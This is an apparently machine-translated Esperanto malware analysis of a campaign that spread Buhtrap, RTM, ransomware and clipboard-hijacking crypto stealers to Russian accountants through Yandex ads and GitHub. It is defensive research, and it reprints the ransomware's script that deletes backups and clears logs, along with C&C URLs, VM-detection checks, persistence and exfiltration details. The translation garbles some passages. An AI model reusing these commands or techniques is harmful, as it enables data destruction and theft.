Por celi kontistojn en ciberatako, vi povas uzi labordokumentojn, kiujn ili serĉas interrete. Ĉi tio estas proksimume kion cibergrupo faris dum la lastaj monatoj, distribuante konatajn malantaŭajn pordojn. и , same kiel ĉifriloj kaj programaro por ŝteli kriptajn monerojn. Plej multaj celoj situas en Rusio. La atako estis farita per metado de malica reklamado sur Yandex.Direct. Eblaj viktimoj estis direktitaj al retejo kie ili estis petitaj elŝuti malican dosieron kaŝvestitan kiel dokumentŝablono. Yandex forigis la malican reklamadon post nia averto.
La fontkodo de Buhtrap estis likita interrete en la pasinteco por ke ĉiu povas uzi ĝin. Ni ne havas informojn pri havebleco de RTM-kodo.
En ĉi tiu afiŝo ni rakontos al vi kiel la atakantoj distribuis malware uzante Yandex.Direct kaj gastigis ĝin sur GitHub. La afiŝo finiĝos kun teknika analizo de la malware.
Buhtrap kaj RTM revenas en komerco
Mekanismo de disvastigo kaj viktimoj
La diversaj utilaj ŝarĝoj liveritaj al viktimoj dividas oftan disvastigmekanismon. Ĉiuj malicaj dosieroj kreitaj de la atakantoj estis metitaj en du malsamajn deponejojn de GitHub.
Tipe, la deponejo enhavis unu elŝuteblan malican dosieron, kiu ofte ŝanĝiĝis. Ĉar GitHub ebligas al vi vidi la historion de ŝanĝoj al deponejo, ni povas vidi, kia malware estis distribuita dum certa periodo. Por konvinki la viktimon elŝuti la malican dosieron, la retejo blanki-shabloni24[.]ru, montrita en la supra figuro, estis uzata.
La dezajno de la retejo kaj ĉiuj nomoj de la malicaj dosieroj sekvas ununuran koncepton - formojn, ŝablonojn, kontraktojn, specimenojn ktp. Konsiderante ke Buhtrap kaj RTM-programaro jam estis uzataj en atakoj kontraŭ kontistoj en la pasinteco, ni supozis, ke la strategio en la nova kampanjo estas la sama. La sola demando estas kiel la viktimo alvenis al la retejo de la atakantoj.
Infekto
Almenaŭ pluraj eblaj viktimoj, kiuj alvenis en ĉi tiu retejo, estis altiritaj de malica reklamado. Malsupre estas ekzemplo URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kiel vi povas vidi de la ligilo, la standardo estis afiŝita sur la laŭleĝa kontada forumo bb.f2[.]kz. Gravas noti, ke la standardoj aperis en malsamaj retejoj, ĉiuj havis la saman kampanjidentigilon (blanki_rsya), kaj plej rilatas al kontadaj aŭ juraj asistaj servoj. La URL montras, ke la ebla viktimo uzis la peton "elŝuti fakturformularon", kiu subtenas nian hipotezon de celitaj atakoj. Malsupre estas la retejoj, kie aperis la standardoj kaj la respondaj serĉdemandoj.
- elŝutu fakturformularon – bb.f2[.]kz
- specimena kontrakto - Ipopen[.]ru
- specimeno de plendo de aplikaĵo - 77metrov[.]ru
- interkonsento formo - blank-dogovor-kupli-prodazhi[.]ru
- specimena kortuma peticio - zen.yandex[.]ru
- specimena plendo - jurday[.]ru
- specimenaj kontraktoformularoj – Regforum[.]ru
- kontraktoformo – assistentus[.]ru
- specimena apartamento-interkonsento - napravah[.]com
- specimenoj de juraj kontraktoj - avito[.]ru
La retejo blanki-shabloni24[.]ru eble estis agordita por trapasi simplan vidan taksadon. Tipe, reklamo, kiu montras al profesiaspekta retejo kun ligilo al GitHub, ne ŝajnas io evidente malbona. Krome, la atakantoj alŝutis malicajn dosierojn al la deponejo nur por limigita periodo, verŝajne dum la kampanjo. Plejofte, la deponejo de GitHub enhavis malplenan zip-arkivon aŭ malplenan EXE-dosieron. Tiel, atakantoj povis distribui reklamadon per Yandex.Direct sur retejoj, kiuj plej verŝajne estis vizititaj de kontistoj, kiuj venis responde al specifaj serĉdemandoj.
Poste, ni rigardu la diversajn utilajn ŝarĝojn tiamaniere distribuitaj.
Utila Analizo
Kronologio de distribuo
La malica kampanjo komenciĝis fine de oktobro 2018 kaj aktivas en la momento de la skribado. Ĉar la tuta deponejo estis publike havebla sur GitHub, ni kompilis precizan templinion de la distribuado de ses malsamaj malware-familioj (vidu la figuron sube). Ni aldonis linion montrantan kiam la bannerligo estis malkovrita, laŭ mezuro de ESET-telemetrio, por komparo kun git-historio. Kiel vi povas vidi, ĉi tio bone korelacias kun la havebleco de la utila ŝarĝo en GitHub. La diferenco fine de februaro povas esti klarigita per la fakto, ke ni ne havis parton de la ŝanĝhistorio ĉar la deponejo estis forigita de GitHub antaŭ ol ni povis plene akiri ĝin.
Figuro 1. Kronologio de malware distribuo.
Atestiloj pri subskribo de kodo
La kampanjo uzis plurajn atestojn. Iuj estis subskribitaj de pli ol unu malware-familio, kio plue indikas, ke malsamaj specimenoj apartenis al la sama kampanjo. Malgraŭ la havebleco de la privata ŝlosilo, telefonistoj ne sisteme subskribis la binarojn kaj ne uzis la ŝlosilon por ĉiuj specimenoj. Fine de februaro 2019, atakantoj komencis krei nevalidajn subskribojn uzante atestilon posedata de Guglo, por kiu ili ne havis la privatan ŝlosilon.
Ĉiuj atestiloj implikitaj en la kampanjo kaj la malware-familioj, kiujn ili subskribas, estas listigitaj en la suba tabelo.
Ni ankaŭ uzis ĉi tiujn atestojn pri subskribo de kodo por establi ligilojn kun aliaj malware-familioj. Por la plej multaj atestiloj, ni ne trovis specimenojn kiuj ne estis distribuitaj per GitHub-deponejo. Tamen, la atestilo TOV "MARIYA" estis uzata por subskribi malware apartenantan al la botreto , reklamprogramoj kaj ministoj. Estas neverŝajne, ke ĉi tiu malware rilatas al ĉi tiu kampanjo. Plej verŝajne, la atestilo estis aĉetita sur la mallumreto.
Win32/Filecoder.Buhtrap
La unua komponanto, kiu kaptis nian atenton, estis la nove malkovrita Win32/Filecoder.Buhtrap. Ĉi tio estas Delphi binara dosiero, kiu foje estas pakita. Ĝi estis plejparte distribuita en februaro-marto 2019. Ĝi kondutas kiel konvenas al ransomware programo - ĝi serĉas lokajn diskojn kaj retajn dosierujojn kaj ĉifras la detektitajn dosierojn. Ĝi ne bezonas interretan konekton por esti kompromitita ĉar ĝi ne kontaktas la servilon por sendi ĉifrajn ŝlosilojn. Anstataŭe, ĝi aldonas "ĵetonon" al la fino de la elaĉetomono, kaj sugestas uzi retpoŝton aŭ Bitmessage por kontakti funkciigistojn.
Por ĉifri kiel eble plej multajn sentemajn rimedojn, Filecoder.Buhtrap rulas fadenon desegnitan por malŝalti ŝlosilan programaron, kiu povas havi malfermitajn dosiertraktistojn enhavantajn valorajn informojn, kiuj povus malhelpi ĉifradon. La celprocezoj estas ĉefe datumbazaj estrosistemoj (DBMS). Krome, Filecoder.Buhtrap forigas protokolojn kaj sekurkopiojn por malfaciligi la reakiron de datumoj. Por fari tion, rulu la batan skripton sube.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap uzas laŭleĝan interretan IP Logger-servon desegnitan por kolekti informojn pri retejvizitantoj. Ĉi tio celas spuri viktimojn de la ransomware, kiu estas la respondeco de la komandlinio:
mshta.exe "javascript:document.write('');"
Dosieroj por ĉifrado estas elektitaj se ili ne kongruas kun tri ekskludlistoj. Unue, dosieroj kun la sekvaj etendaĵoj ne estas ĉifritaj: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys kaj .vesperto. Due, ĉiuj dosieroj por kiuj la plena vojo enhavas dosierujojn el la malsupra listo estas ekskluditaj.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Trie, iuj dosiernomoj ankaŭ estas ekskluditaj de ĉifrado, inter ili la dosiernomo de la elaĉeta mesaĝo. La listo estas prezentita sube. Evidente, ĉiuj ĉi tiuj esceptoj celas pluigi la maŝinon funkcianta, sed kun minimuma veturtaŭgeco.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Dosiera ĉifrada skemo
Post kiam ekzekutita, la malware generas 512-bitan RSA-ŝlosilparon. La privata eksponento (d) kaj modulo (n) tiam estas ĉifritaj per malmola kodita 2048-bita publika ŝlosilo (publika eksponento kaj modulo), zlib-pakita, kaj bazo64 ĉifrita. La kodo respondeca por tio estas montrita en Figuro 2.
Figuro 2. Rezulto de Hex-Rays-malkompilo de la 512-bita RSA-ŝlosila paro genera procezo.
Malsupre estas ekzemplo de simpla teksto kun generita privata ŝlosilo, kiu estas ĵetono alkroĉita al la elaĉeta mesaĝo.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
La publika ŝlosilo de la atakantoj estas donita malsupre.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
La dosieroj estas ĉifritaj per AES-128-CBC kun 256-bita ŝlosilo. Por ĉiu ĉifrita dosiero, nova ŝlosilo kaj nova inicialigvektoro estas generitaj. La ŝlosilaj informoj estas aldonitaj al la fino de la ĉifrita dosiero. Ni konsideru la formaton de la ĉifrita dosiero.
Ĉifritaj dosieroj havas la sekvan kaplinion:
La fontdosierdatenoj kun aldono de la VEGA-magia valoro estas ĉifrita al la unuaj 0x5000 bajtoj. Ĉiuj malĉifraj informoj estas alkroĉitaj al dosiero kun la sekva strukturo:
- La dosiergranda markilo enhavas markon indikantan ĉu la dosiero estas pli granda ol 0x5000 bajtoj en grandeco
— AES-ŝlosila blob = ZlibCompress (RSAEncrypt (AES-ŝlosilo + IV, publika ŝlosilo de la generita RSA-ŝlosilparo))
- RSA-ŝlosila blob = ZlibCompress (RSAEncrypt (generita RSA privata ŝlosilo, malmola kodita RSA publika ŝlosilo))
Win32/ClipBanker
Win32/ClipBanker estas komponanto kiu estis distribuita intermite de malfrua oktobro ĝis frua decembro 2018. Ĝia rolo estas kontroli la enhavon de la tondujo, ĝi serĉas adresojn de kriptaj monujoj. Determininte la cel-monujo-adreson, ClipBanker anstataŭigas ĝin per adreso kredita aparteni al la telefonistoj. La specimenoj, kiujn ni ekzamenis, estis nek boksitaj nek malklarigitaj. La nura mekanismo uzata por maski konduton estas ŝnuroĉifrado. Operaciisto-monujo-adresoj estas ĉifritaj per RC4. Celaj kriptaj moneroj estas Bitcoin, Bitcoin-mono, Dogecoin, Ethereum kaj Ripple.
Dum la periodo la malware disvastiĝis al la Bitcoin-monujoj de la atakantoj, malgranda kvanto estis sendita al VTS, kio dubas pri la sukceso de la kampanjo. Aldone, ne ekzistas evidenteco por sugesti, ke ĉi tiuj transakcioj tute rilatas al ClipBanker.
Win32/RTM
La Win32/RTM-komponento estis distribuita dum pluraj tagoj komence de marto 2019. RTM estas troja bankisto skribita en Delfo, celita al malproksimaj banksistemoj. En 2017, ESET-esploristoj publikigis de ĉi tiu programo, la priskribo daŭre estas grava. En januaro 2019, Palo Alto Networks ankaŭ publikigis .
Buhtrap Ŝargilo
Dum iom da tempo, elŝutilo estis havebla sur GitHub kiu ne estis simila al antaŭaj Buhtrap-iloj. Li turnas sin al https://94.100.18[.]67/RSS.php?<some_id> por akiri la sekvan etapon kaj ŝarĝi ĝin rekte en memoron. Ni povas distingi du kondutojn de la dua faza kodo. En la unua URL, RSS.php rekte pasis la malantaŭan pordon de Buhtrap - ĉi tiu malantaŭa pordo estas tre simila al tiu disponebla post kiam la fontkodo estis likita.
Kurioze, ni vidas plurajn kampanjojn kun la malantaŭa pordo de Buhtrap, kaj ili estas supozeble prizorgataj de malsamaj telefonistoj. En ĉi tiu kazo, la ĉefa diferenco estas, ke la malantaŭa pordo estas ŝarĝita rekte en memoron kaj ne uzas la kutiman skemon kun la DLL-deplojprocezo pri kiu ni parolis. . Krome, la funkciigistoj ŝanĝis la RC4-ŝlosilon uzatan por ĉifri rettrafikon al la C&C-servilo. En la plej multaj el la kampanjoj kiujn ni vidis, funkciigistoj ne ĝenis ŝanĝi ĉi tiun ŝlosilon.
La dua, pli kompleksa konduto estis, ke la RSS.php URL estis transdonita al alia ŝargilo. Ĝi efektivigis iom da malklarigado, kiel rekonstruado de la dinamika importtabelo. La celo de la ekŝargilo estas kontakti la C&C-servilon [.]com/api/F27F84EDA4D13B15/2, sendu la protokolojn kaj atendu respondon. Ĝi prilaboras la respondon kiel blob, ŝarĝas ĝin en memoron kaj efektivigas ĝin. La utila ŝarĝo, kiun ni vidis ekzekuti ĉi tiun ŝargilon, estis la sama malantaŭa pordo de Buhtrap, sed eble ekzistas aliaj komponantoj.
Android/Spiono.Bankisto
Interese, komponanto por Android ankaŭ estis trovita en la GitHub-deponejo. Li estis en la ĉefa branĉo nur unu tagon - la 1-an de novembro 2018. Krom esti afiŝita sur GitHub, ESET-telemetrio trovas neniujn signojn pri ĉi tiu malware distribuata.
La komponanto estis gastigita kiel Android-Aplika Pako (APK). Ĝi estas tre malklarigita. La malica konduto estas kaŝita en ĉifrita JAR situanta en la APK. Ĝi estas ĉifrita per RC4 uzante ĉi tiun ŝlosilon:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
La sama ŝlosilo kaj algoritmo estas uzataj por ĉifri ŝnurojn. JAR situas en APK_ROOT + image/files. La unuaj 4 bajtoj de la dosiero enhavas la longon de la ĉifrita JAR, kiu komenciĝas tuj post la longokampo.
Malĉifrinte la dosieron, ni malkovris, ke ĝi estis Anubis - antaŭe bankisto por Android. La malware havas la jenajn funkciojn:
- mikrofono registrado
- prenante ekrankopiojn
- akiri GPS-koordinatojn
- keylogger
- aparataj datumoj ĉifrado kaj elaĉetomono postulo
- sendante spamon
Kurioze, la bankisto uzis Twitter kiel rezervan komunikan kanalon por akiri alian C&C-servilon. La specimeno, kiun ni analizis, uzis la konton @JonesTrader, sed en la momento de la analizo ĝi jam estis blokita.
La bankisto enhavas liston de celaj aplikoj sur la Android-aparato. Ĝi estas pli longa ol la listo akirita en la Sophos-studo. La listo inkluzivas multajn bankajn aplikojn, interretajn butikumadprogramojn kiel Amazon kaj eBay, kaj kriptajn servojn.
MSIL/ClipBanker.IH
La lasta komponanto distribuita kadre de ĉi tiu kampanjo estis la plenumebla .NET Vindozo, kiu aperis en marto 2019. La plej multaj el la studitaj versioj estis pakitaj kun ConfuserEx v1.0.0. Kiel ClipBanker, ĉi tiu komponanto uzas la tondujo. Lia celo estas larĝa gamo de kriptaj moneroj, same kiel ofertoj sur Steam. Aldone, li uzas la servon IP Logger por ŝteli la privatan WIF-ŝlosilon de Bitcoin.
Protektaj Mekanismoj
Aldone al la avantaĝoj, kiujn ConfuserEx provizas en malhelpado de senararigado, forĵetado kaj mistraktado, la komponento inkluzivas la kapablon detekti kontraŭvirusajn produktojn kaj virtualajn maŝinojn.
Por kontroli, ke ĝi funkcias en virtuala maŝino, la malware uzas la enkonstruitan Vindozan WMI-komandlinion (WMIC) por peti informojn pri BIOS, nome:
wmic bios
Tiam la programo analizas la komandan eligon kaj serĉas ŝlosilvortojn: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Por detekti kontraŭvirusajn produktojn, malware sendas peton de Windows Management Instrumentation (WMI) al Windows Security Center uzante ManagementObjectSearcher API kiel montrite sube. Post malkodado de bazo64 la voko aspektas jene:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figuro 3. Procezo por identigi antivirusajn produktojn.
Krome, la malware kontrolas ĉu , ilo por protekti kontraŭ tonduj atakoj kaj, se ruli, suspendas ĉiujn fadenojn en tiu procezo, tiel malŝaltante la protekton.
Persisto
La versio de malware, kiun ni studis, kopias sin %APPDATA%googleupdater.exe kaj fiksas la "kaŝitan" atributon por la gugla dosierujo. Tiam ŝi ŝanĝas la valoron SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell en la Vindoza registro kaj aldonas la vojon updater.exe. Tiel, la malware estos ekzekutita ĉiufoje kiam la uzanto ensalutas.
Malica konduto
Kiel ClipBanker, la malware monitoras la enhavon de la tondujo kaj serĉas kriptajn monujojn adresojn, kaj kiam trovite, anstataŭigas ĝin per unu el la adresoj de la funkciigisto. Malsupre estas listo de cel-adresoj bazitaj sur tio, kio troviĝas en la kodo.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Por ĉiu speco de adreso estas responda regula esprimo. La STEAM_URL-valoro estas uzata por ataki la Steam-sistemon, kiel videblas el la regula esprimo, kiu estas uzata por difini en la bufro:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Eksfiltrada kanalo
Krom anstataŭigi adresojn en la bufro, la malware celas la privatajn WIF-ŝlosilojn de Bitcoin, Bitcoin Core kaj Electrum Bitcoin-monujoj. La programo uzas plogger.org kiel eksfiltran kanalon por akiri la privatan ŝlosilon WIF. Por fari tion, telefonistoj aldonas privatajn ŝlosilajn datumojn al la HTTP-kapo de Uzanto-Agente, kiel montrite sube.
Figuro 4. IP Logger-konzolo kun eligo-datumoj.
Funkciistoj ne uzis iplogger.org por eksfiltri monujojn. Ili verŝajne frekventis malsaman metodon pro la 255 signolimo en la kampo User-Agentmontrata en la interfaco de IP Logger. En la specimenoj, kiujn ni studis, la alia eligo-servilo estis konservita en la mediovariablo DiscordWebHook. Surprize, ĉi tiu mediovariablo ne estas asignita ie ajn en la kodo. Ĉi tio sugestas, ke la malware estas ankoraŭ evoluanta kaj la variablo estas asignita al la testmaŝino de la funkciigisto.
Estas alia signo, ke la programo disvolviĝas. La binara dosiero inkluzivas du URL-ojn de iplogger.org, kaj ambaŭ estas pridemanditaj kiam datumoj estas eksfiltrataj. En peto al unu el ĉi tiuj URL-oj, la valoro en la kampo Referer estas antaŭita de "DEV /". Ni ankaŭ trovis version kiu ne estis pakita per ConfuserEx, la ricevanto por ĉi tiu URL nomiĝas DevFeedbackUrl. Surbaze de la medio-varia nomo, ni kredas, ke la telefonistoj planas uzi la leĝan servon Discord kaj ĝian interretan interkaptan sistemon por ŝteli kriptajn monujojn.
konkludo
Ĉi tiu kampanjo estas ekzemplo de la uzo de legitimaj reklamaj servoj en ciberatakoj. La skemo celas rusajn organizojn, sed ni ne surprizus vidi tian atakon uzante ne-rusajn servojn. Por eviti kompromison, uzantoj devas esti certaj pri la reputacio de la fonto de la programaro, kiun ili elŝutas.
Kompleta listo de indikiloj de kompromiso kaj MITRE ATT&CK-atributoj estas havebla ĉe .
fonto: www.habr.com